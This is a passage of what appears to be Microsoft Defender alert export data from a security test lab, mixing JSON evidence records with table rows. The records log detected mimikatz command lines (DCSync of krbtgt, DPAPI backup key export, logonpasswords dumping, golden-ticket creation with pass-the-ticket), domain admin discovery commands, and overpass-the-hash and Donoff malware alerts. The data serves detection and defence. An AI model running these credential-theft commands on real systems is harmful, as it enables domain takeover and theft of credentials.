"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:14:25.5266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:25.5266667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-21T02:02:27.0051694Z",
"processId": 8844,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:25.6Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-21T02:02:27.1310359Z",
"processId": 9780,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:54.2366667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt: /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-11-21T02:02:27.4595079Z",
"processId": 8332,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:18:07.02Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-21T02:06:53.5444799Z",
"processId": 10200,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:18:07.0533333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-11-21T02:06:53.9715954Z",
"processId": 6948,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:18:07.1666667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-21T02:06:53.7913003Z",
"processId": 1912,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:22:52.8033333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-21T02:11:22.0003786Z",
"processId": 8320,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:45.7366667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-21T02:11:50.2848714Z",
"processId": 2256,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:46.3233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-21T02:11:50.3921031Z",
"processId": 9404,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638060594559668623_1450940669 | c1ca76d2-397e-428d-9edf-300936c126d4 | 794 | MicrosoftDefenderForEndpoint | 2022-12-08T01:24:15.9668895Z | 2022-12-08T01:37:06.9Z | null | 2022-12-08T01:12:10.8397945Z | 2022-12-08T01:12:10.8397945Z | 'Donoff' malware was prevented | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | New | Informational | 56 | PartiallyRemediated | null | null | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | null | null | Donoff | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "21H1",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-08T01:24:16.0866667Z",
"fileName": "TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating child processes",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "7bb22f50157cf267281a81918540f4aed4e0b0e1",
"sha256": "f5ec6a746f5d70212a8779e33722964c9ede5c23b3e171cd01e68b1a6c954e86",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043457314089213_726148940 | da638043457314089213_726148940 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:22:11.4090201Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:09:26.9093402Z | 2022-11-18T05:14:15.467908Z | Successful logon using overpass-the-hash with potentially stolen credentials | An attacker accessed a resource with credentials that might have been obtained using an overpass-the-hash attack. An overpass-the-hash attack typically involves obtaining a password hash from memory and then using the hash to obtain a Kerberos ticket. The ticket is then used to authenticate to network resources. | LateralMovement | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | MTP | 9bd9c53d-2d3a-4af1-8c6d-a1d33ec33ede | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1550.002",
"T1550.003"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "None",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:22:11.45Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": "0001-01-01T00:00:00Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 0,
"processCommandLine": "",
"processCreationTime": "0001-01-01T00:00:00Z",
"processId": 0,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:22:11.45Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-18T05:22:11.45Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:22:11.9366667Z",
"fileName": "lsass.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:18.9649669Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 564,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-11-16T03:32:19.0481621Z",
"processId": 656,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "1754e7ee417e56c9c196b1dc7fbf663a43d15d16",
"sha256": "0777fd312394ae1afeed0ad48ae2d7b5ed6e577117a4f40305eaeb4129233650",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:22:11.9366667Z",
"fileName": "lsass.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "1754e7ee417e56c9c196b1dc7fbf663a43d15d16",
"sha256": "0777fd312394ae1afeed0ad48ae2d7b5ed6e577117a4f40305eaeb4129233650",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:22:11.9366667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:18:37.01Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,044 | "mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit | 2022-11-11T08:17:06.3382251Z | 4,704 | 2022-11-11T08:16:44.2952776Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638045930248588617_-75248204 | 825ec6ee-9417-4697-8545-ab1426e8f52b | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:44.8588788Z | 2022-11-21T02:48:02.1166667Z | null | 2022-11-21T02:01:36.9984727Z | 2022-11-21T02:33:54.0400057Z | Suspicious Permission Groups Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | null | null | null | [
"T1069.001",
"T1069.002",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "staging.net",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:44.9Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:44.9Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:01:37.8071047Z",
"processId": 10556,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:44.9Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'",
"processCreationTime": "2022-11-21T02:01:28.4753286Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:49.26Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-21T02:01:37.8813359Z",
"processId": 2852,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:07:53.61Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:05:24.90337Z",
"processId": 10368,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
